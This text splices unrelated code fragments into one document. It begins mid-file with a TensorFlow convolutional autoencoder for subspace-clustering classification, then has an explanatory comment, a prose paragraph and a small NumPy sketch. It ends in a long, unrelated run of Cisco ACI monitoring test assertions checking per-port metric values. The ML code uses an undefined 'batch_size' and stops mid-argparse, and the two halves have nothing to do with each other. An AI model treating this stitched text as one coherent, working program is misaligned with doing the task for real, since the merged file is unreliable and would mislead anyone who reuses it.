initializer=layers.xavier_initializer_conv2d()) all_weights['dec_b0'] = tf.Variable(tf.zeros([self.n_hidden[1]], dtype=tf.float32)) all_weights['dec_w1'] = tf.get_variable("dec1_w1", shape=[self.kernel_size[1], self.kernel_size[1], self.n_hidden[0], self.n_hidden[1]], initializer=layers.xavier_initializer_conv2d()) all_weights['dec_b1'] = tf.Variable(tf.zeros([self.n_hidden[0]], dtype=tf.float32)) all_weights['dec_w2'] = tf.get_variable("dec1_w2", shape=[self.kernel_size[0], self.kernel_size[0], 1, self.n_hidden[0]], initializer=layers.xavier_initializer_conv2d()) all_weights['dec_b2'] = tf.Variable(tf.zeros([1], dtype=tf.float32)) all_weights['enc_w3'] = tf.get_variable("enc_w3", shape=[self.kernel_size[3], self.kernel_size[3], self.n_hidden[2], self.n_hidden[3]], initializer=layers.xavier_initializer_conv2d()) all_weights['enc_b3'] = tf.Variable(tf.zeros([self.n_hidden[3]], dtype=tf.float32)) all_weights['Coef'] = tf.Variable(1.0e-4 * tf.ones([self.test_size, self.train_size], tf.float32), name='Coef') return all_weights # Building the encoder def encoder(self, X, weights): shapes = [] # Encoder Hidden layer with relu activation #1 shapes.append(X.get_shape().as_list()) layer1 = tf.nn.bias_add( tf.nn.conv2d(X, weights['enc_w0'], strides=[1, 2, 2, 1], padding='SAME'), weights['enc_b0']) layer1 = tf.nn.relu(layer1) layer2 = tf.nn.bias_add( tf.nn.conv2d(layer1, weights['enc_w1'], strides=[1, 1, 1, 1], padding='SAME'), weights['enc_b1']) layer2 = tf.nn.relu(layer2) layer3 = tf.nn.bias_add( tf.nn.conv2d(layer2, weights['enc_w2'], strides=[1, 2, 2, 1], padding='SAME'), weights['enc_b2']) layer3 = tf.nn.relu(layer3) latents = layer3 print(layer3.shape) 
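# The `shapes` list populated around this point (input, layer1, layer2, latent) is
# what decoder() consumes in reverse: shapes[2], shapes[1] and shapes[0] become the
# output_shape arguments of its conv2d_transpose layers, so the decoder mirrors the
# encoder's spatial dimensions.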
shapes.append(layer1.get_shape().as_list()) shapes.append(layer2.get_shape().as_list()) layer3_in = layer3 latent = tf.nn.conv2d(layer3_in, weights['enc_w3'], strides=[1, 1, 1, 1], padding='SAME') latent = tf.nn.relu(latent) shapes.append(latent.get_shape().as_list()) return latent, latents, shapes # Building the decoder def decoder(self, z, weights, shapes): # Encoder Hidden layer with relu activation #1 shape_de1 = shapes[2] layer1 = tf.add(tf.nn.conv2d_transpose(z, weights['dec_w0'], tf.stack( [tf.shape(self.x)[0], shape_de1[1], shape_de1[2], shape_de1[3]]), \ strides=[1, 2, 2, 1], padding='SAME'), weights['dec_b0']) layer1 = tf.nn.relu(layer1) shape_de2 = shapes[1] layer2 = tf.add(tf.nn.conv2d_transpose(layer1, weights['dec_w1'], tf.stack( [tf.shape(self.x)[0], shape_de2[1], shape_de2[2], shape_de2[3]]), \ strides=[1, 1, 1, 1], padding='SAME'), weights['dec_b1']) layer2 = tf.nn.relu(layer2) shape_de3 = shapes[0] layer3 = tf.add(tf.nn.conv2d_transpose(layer2, weights['dec_w2'], tf.stack( [tf.shape(self.x)[0], shape_de3[1], shape_de3[2], shape_de3[3]]), \ strides=[1, 2, 2, 1], padding='SAME'), weights['dec_b2']) layer3 = tf.nn.relu(layer3) recons = layer3 return recons def partial_fit(self, X,Y, lr): cost, summary, _, Coef = self.sess.run( (self.reconst_cost_x, self.merged_summary_op, self.optimizer, self.Coef_test), feed_dict={self.learning_rate:lr,self.train:Y,self.test:X}) self.summary_writer.add_summary(summary, self.iter) self.iter = self.iter + 1 return cost, Coef def pretrain_step(self, X,Y, lr): cost, summary, _ = self.sess.run( (self.reconst_cost_x, self.merged_summary_op, self.optimizer_pretrain), feed_dict={self.learning_rate:lr,self.train:Y,self.test:X}) self.summary_writer.add_summary(summary, self.iter) self.iter = self.iter + 1 return cost def initlization(self): self.sess.run(self.init) def reconstruct(self, X): return self.sess.run(self.x_r, feed_dict={self.x:X}) def transform(self, X,Y): return self.sess.run(self.AE, feed_dict={self.train:Y,self.test:X}) def save_model(self): save_path = self.saver.save(self.sess, self.model_path) print ("model saved in file: %s" % save_path) def restore(self): self.saver.restore(self.sess, self.restore_path) print ("model restored") def thrC(C, ro=0.1): if ro < 1: N1 = C.shape[0] N2 = C.shape[1] Cp = np.zeros((N1, N2)) S = np.abs(np.sort(-np.abs(C), axis=0)) Ind = np.argsort(-np.abs(C), axis=0) for i in range(N2): cL1 = np.sum(S[:, i]).astype(float) stop = False csum = 0 t = 0 while (stop == False): csum = csum + S[t, i] if csum > ro * cL1: stop = True Cp[Ind[0:t + 1, i], i] = C[Ind[0:t + 1, i], i] t = t + 1 else: Cp = C return Cp def err_rate(gt_s, s): err_x = np.sum(gt_s[:] != s[:]) missrate = err_x.astype(float) / (gt_s.shape[0]) return missrate def testing(Img_test,Img_train, train_labels,test_labels, CAE, num_class,args): Img_test = np.array(Img_test) Img_test = Img_test.astype(float) Img_train = np.array(Img_train) Img_train = Img_train.astype(float) train_labels = np.array(train_labels[:]) train_labels = train_labels - train_labels.min() + 1 train_labels = np.squeeze(train_labels) test_labels = np.array(test_labels[:]) test_labels = test_labels - test_labels.min() + 1 test_labels = np.squeeze(test_labels) #Img_test=np.hstack((Img_test,Img_train)) #test_labels=np. 
#print(train_labels.shape) #print(test_labels.shape) #Img_test=np.vstack((Img_test,Img_train)) #test_labels=np.vstack((test_labels,train_labels)) #print(aaa.shape) CAE.initlization() max_step = args.max_step # 500 + num_class*25# 100+num_class*20 pretrain_max_step = args.pretrain_step display_step = args.display_step #max_step lr = 1.0e-3 epoch = 0 class_ = np.zeros(np.max(test_labels)) prediction = np.zeros(len(test_labels)) ACC =[] Cost=[] while epoch < pretrain_max_step: epoch = epoch + 1 cost = CAE.pretrain_step(Img_test,Img_train, lr) # if epoch % display_step == 0: print ("pretrtain epoch: %.1d" % epoch, "cost: %.8f" % (cost / float(batch_size))) while epoch < max_step: epoch = epoch + 1 cost, Coef = CAE.partial_fit(Img_test,Img_train, lr) # if epoch % display_step == 0: print ("epoch: %.1d" % epoch, "cost: %.8f" % (cost / float(batch_size))) Coef = thrC(Coef) Coef= np.abs(Coef) for test_sample in range(0,len(test_labels)): x = Coef[test_sample,:] for l in range(1,np.max(test_labels)+1): l_idx = np.array([j for j in range(0,len(train_labels)) if train_labels[j]==l]) l_idx= l_idx.astype(int) class_[int(l-1)] = sum(np.abs(x[l_idx])) prediction[test_sample] = np.argmax(class_) +1 prediction = np.array(prediction) missrate_x = err_rate(test_labels, prediction) acc_x = 1 - missrate_x print("accuracy: %.4f" % acc_x) ACC.append(acc_x) Cost.append(cost / float(batch_size)) if False: # change to ture to save values in a mat file sio.savemat('./coef.mat', dict(ACC=ACC,Coef=Coef,Cost=Cost)) return acc_x, Coef def get_train_test_data(data,training_rate=0.8): ''' Extracts features and labels from the dictionary "data," and splits the samples into training and testing sets. Input: data: dictionary containing two keys: {feature, Label} data['features'] : vectorized features (1024 x N) data['Label'] : groundtruth labels (1 x N) rate: ratio of the # of training samples to the total # of samples Output: training and testing sets. ''' Label = data['Label'] Label = np.squeeze(np.array(Label)) training_size = int(training_rate * len(Label)) perm = np.random.permutation(len(Label)) training_idx = perm[:training_size] testing_idx = perm[training_size:] train_labels = Label[training_idx] test_labels = Label[testing_idx] I_test = [] I_train = [] img = data['features'] training_img = img[:,training_idx] testing_img = img[:,testing_idx] for i in range(training_img.shape[1]): temp = np.reshape(training_img[:, i], [32, 32]) I_train.append(temp) Img_train = np.transpose(np.array(I_train), [0, 2, 1]) Img_train = np.expand_dims(Img_train[:], 3) for i in range(testing_img.shape[1]): temp = np.reshape(testing_img[:, i], [32, 32]) I_test.append(temp) Img_test = np.transpose(np.array(I_test), [0, 2, 1]) Img_test = np.expand_dims(Img_test[:], 3) return Img_train,Img_test,train_labels,test_labels,Label if __name__ == '__main__': random.seed(2019) parser = argparse.ArgumentParser(description='') parser.add_argument('--mat', dest='mat', default='umd', help='path of the dataset') parser.add_argument('--model', dest='model', default='umd', help='name of the model to be saved') parser.add_argument('--rate', dest='rate', type=float, default=0.8, help='Pecentage of samples ') parser.add_argument('--epoch', dest='max_step', type=int, default=10000, help='Max # training epochs') parser.add_argument('--pretrain_step', dest='pretrain_step', type=int, default=1000, help='Max # of pretraining epochs ') parser.add_argument('--display_step', dest='display_step', type=int, default=1000, help='frequency of reports')
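The testing() routine above assigns each test sample to the class whose training samples absorb the largest total |coefficient| mass in Coef. A minimal NumPy sketch of that rule with hypothetical toy data; classify_from_coef is an illustrative helper, not part of the code above.

import numpy as np

def classify_from_coef(coef, train_labels):
    # coef: (num_test, num_train); train_labels: (num_train,), labels start at 1
    num_classes = int(train_labels.max())
    preds = np.zeros(coef.shape[0], dtype=int)
    for i, row in enumerate(np.abs(coef)):
        class_mass = [row[train_labels == c].sum() for c in range(1, num_classes + 1)]
        preds[i] = int(np.argmax(class_mass)) + 1
    return preds

# Toy example: 2 test samples, 4 training samples from classes 1 and 2
coef = np.array([[0.9, 0.1, 0.0, 0.05],
                 [0.0, 0.2, 0.7, 0.6]])
train_labels = np.array([1, 1, 2, 2])
print(classify_from_coef(coef, train_labels))  # -> [1 2]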
value=0.0, tags=tags101 + ['port:eth101/1/22'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/23'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/24'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/25'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/26'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/27'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/28'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/29'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/30'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/31'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/32'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/33'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/34'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/35'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/36'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/37'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/38'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/39'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/40'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/41'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/42'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags102 + ['port:eth1/33'], hostname=hn102) aggregator.assert_metric(metric_name, value=0.0, tags=tags102 + ['port:eth1/48'], hostname=hn102) aggregator.assert_metric(metric_name, value=3672.0, tags=tags102 + ['port:eth1/49'], hostname=hn102) aggregator.assert_metric(metric_name, value=100145009.0, tags=tags102 + ['port:eth1/50'], hostname=hn102) aggregator.assert_metric(metric_name, value=0.0, tags=tags102 + ['port:eth1/1'], hostname=hn102) aggregator.assert_metric(metric_name, value=0.0, tags=tags102 + ['port:eth1/2'], hostname=hn102) aggregator.assert_metric(metric_name, value=0.0, tags=tags102 + ['port:eth1/3'], hostname=hn102) aggregator.assert_metric(metric_name, value=0.0, tags=tags102 + ['port:eth1/4'], hostname=hn102) aggregator.assert_metric(metric_name, value=0.0, tags=tags102 + ['port:eth1/15'], hostname=hn102) aggregator.assert_metric(metric_name, value=0.0, tags=tags102 + ['port:eth1/5'], hostname=hn102) aggregator.assert_metric(metric_name, value=0.0, tags=tags102 + ['port:eth1/6'], hostname=hn102) aggregator.assert_metric(metric_name, value=855.0, tags=tags102 + ['port:eth1/7'], hostname=hn102) aggregator.assert_metric(metric_name, value=0.0, tags=tags102 + ['port:eth1/8'], hostname=hn102) aggregator.assert_metric(metric_name, value=0.0, tags=tags102 + ['port:eth1/9'], hostname=hn102) aggregator.assert_metric(metric_name, value=0.0, tags=tags102 + 
['port:eth1/10'], hostname=hn102) aggregator.assert_metric(metric_name, value=0.0, tags=tags102 + ['port:eth1/11'], hostname=hn102) aggregator.assert_metric(metric_name, value=0.0, tags=tags102 + ['port:eth1/12'], hostname=hn102) aggregator.assert_metric(metric_name, value=5652770907.0, tags=tags202 + ['port:eth1/1'], hostname=hn202) aggregator.assert_metric(metric_name, value=2224410566.0, tags=tags202 + ['port:eth1/2'], hostname=hn202) aggregator.assert_metric(metric_name, value=3865435435.0, tags=tags201 + ['port:eth1/1'], hostname=hn201) aggregator.assert_metric(metric_name, value=4030471655.0, tags=tags201 + ['port:eth1/2'], hostname=hn201) metric_name = 'cisco_aci.fabric.port.egr_bytes.unicast.cum' aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/43'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/44'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/45'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/46'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/47'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/48'], hostname=hn101) aggregator.assert_metric(metric_name, value=370475792067.0, tags=tags101 + ['port:eth1/1'], hostname=hn101) aggregator.assert_metric(metric_name, value=263131271762.0, tags=tags101 + ['port:eth1/2'], hostname=hn101) aggregator.assert_metric(metric_name, value=342315261222.0, tags=tags101 + ['port:eth1/3'], hostname=hn101) aggregator.assert_metric(metric_name, value=14238340.0, tags=tags101 + ['port:eth1/4'], hostname=hn101) aggregator.assert_metric(metric_name, value=14238340.0, tags=tags101 + ['port:eth1/5'], hostname=hn101) aggregator.assert_metric(metric_name, value=242134018.0, tags=tags101 + ['port:eth1/6'], hostname=hn101) aggregator.assert_metric(metric_name, value=344482735664.0, tags=tags101 + ['port:eth1/7'], hostname=hn101) aggregator.assert_metric(metric_name, value=2375462007802685.0, tags=tags101 + ['port:eth1/9'], hostname=hn101) aggregator.assert_metric(metric_name, value=72584223945.0, tags=tags101 + ['port:eth1/8'], hostname=hn101) aggregator.assert_metric(metric_name, value=2717547044839.0, tags=tags101 + ['port:eth1/10'], hostname=hn101) aggregator.assert_metric(metric_name, value=30785612.0, tags=tags101 + ['port:eth1/11'], hostname=hn101) aggregator.assert_metric(metric_name, value=122270987.0, tags=tags101 + ['port:eth1/12'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/15'], hostname=hn101) aggregator.assert_metric(metric_name, value=913331247.0, tags=tags101 + ['port:eth1/19'], hostname=hn101) aggregator.assert_metric(metric_name, value=1918138777.0, tags=tags101 + ['port:eth1/33'], hostname=hn101) aggregator.assert_metric(metric_name, value=77293415849.0, tags=tags101 + ['port:eth1/48'], hostname=hn101) aggregator.assert_metric(metric_name, value=330426792155.0, tags=tags101 + ['port:eth1/49'], hostname=hn101) aggregator.assert_metric(metric_name, value=302746138922.0, tags=tags101 + ['port:eth1/50'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/1'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/2'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/3'], hostname=hn101) 
aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/4'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/5'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/6'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/7'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/8'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/9'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/10'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/11'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/12'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/13'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/14'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/15'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/16'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/17'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/18'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/19'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/20'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/21'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/22'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/23'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/24'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/25'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/26'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/27'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/28'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/29'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/30'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/31'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/32'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/33'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/34'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/35'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/36'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/37'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/38'], 
hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/39'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/40'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/41'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/42'], hostname=hn101) aggregator.assert_metric(metric_name, value=122246714.0, tags=tags102 + ['port:eth1/33'], hostname=hn102) aggregator.assert_metric(metric_name, value=62665015.0, tags=tags102 + ['port:eth1/48'], hostname=hn102) aggregator.assert_metric(metric_name, value=222183688736.0, tags=tags102 + ['port:eth1/49'], hostname=hn102) aggregator.assert_metric(metric_name, value=212143547054.0, tags=tags102 + ['port:eth1/50'], hostname=hn102) aggregator.assert_metric(metric_name, value=134113229564.0, tags=tags102 + ['port:eth1/1'], hostname=hn102) aggregator.assert_metric(metric_name, value=203653209556.0, tags=tags102 + ['port:eth1/2'], hostname=hn102) aggregator.assert_metric(metric_name, value=91067116.0, tags=tags102 + ['port:eth1/3'], hostname=hn102) aggregator.assert_metric(metric_name, value=14238624.0, tags=tags102 + ['port:eth1/4'], hostname=hn102) aggregator.assert_metric(metric_name, value=0.0, tags=tags102 + ['port:eth1/15'], hostname=hn102) aggregator.assert_metric(metric_name, value=7077.0, tags=tags102 + ['port:eth1/17'], hostname=hn102) aggregator.assert_metric(metric_name, value=14238908.0, tags=tags102 + ['port:eth1/5'], hostname=hn102) aggregator.assert_metric(metric_name, value=10568776.0, tags=tags102 + ['port:eth1/6'], hostname=hn102) aggregator.assert_metric(metric_name, value=531249211611.0, tags=tags102 + ['port:eth1/7'], hostname=hn102) aggregator.assert_metric(metric_name, value=172484213872.0, tags=tags102 + ['port:eth1/8'], hostname=hn102) aggregator.assert_metric(metric_name, value=30565216.0, tags=tags102 + ['port:eth1/9'], hostname=hn102) aggregator.assert_metric(metric_name, value=30780750.0, tags=tags102 + ['port:eth1/10'], hostname=hn102) aggregator.assert_metric(metric_name, value=30780464.0, tags=tags102 + ['port:eth1/11'], hostname=hn102) aggregator.assert_metric(metric_name, value=122246714.0, tags=tags102 + ['port:eth1/12'], hostname=hn102) aggregator.assert_metric(metric_name, value=689750718034.0, tags=tags202 + ['port:eth1/1'], hostname=hn202) aggregator.assert_metric(metric_name, value=843245090540.0, tags=tags202 + ['port:eth1/2'], hostname=hn202) aggregator.assert_metric(metric_name, value=694427252279.0, tags=tags201 + ['port:eth1/1'], hostname=hn201) aggregator.assert_metric(metric_name, value=808249335135.0, tags=tags201 + ['port:eth1/2'], hostname=hn201) metric_name = 'cisco_aci.capacity.apic.fabric_node.utilized' aggregator.assert_metric(metric_name, value=0.0, tags=['cisco', 'project:cisco_aci'], hostname='') metric_name = 'cisco_aci.fabric.port.fault_counter.crit' aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/43'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/44'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/45'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/46'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/47'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + 
['port:eth101/1/48'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/1'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/2'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/3'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/4'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/5'], hostname=hn101) aggregator.assert_metric(metric_name, value=1.0, tags=tags101 + ['port:eth1/6'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/7'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/9'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/8'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/10'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/11'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/12'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/13'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/14'], hostname=hn101) aggregator.assert_metric(metric_name, value=1.0, tags=tags101 + ['port:eth1/15'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/16'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/17'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/18'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/19'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/20'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/21'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/22'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/23'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/24'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/25'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/26'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/27'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/28'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/29'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/30'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/31'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/32'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/33'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/34'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/35'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/36'], 
hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/37'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/38'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/39'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/40'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/41'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/42'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/43'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/44'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/45'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/46'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/47'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/48'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/49'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/50'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/51'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/52'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/53'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth1/54'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/1'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/2'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/3'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/4'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/5'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/6'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/7'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/8'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/9'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/10'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/11'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/12'], hostname=hn101) aggregator.assert_metric(metric_name, value=0.0, tags=tags101 + ['port:eth101/1/13'], hostname=hn101) 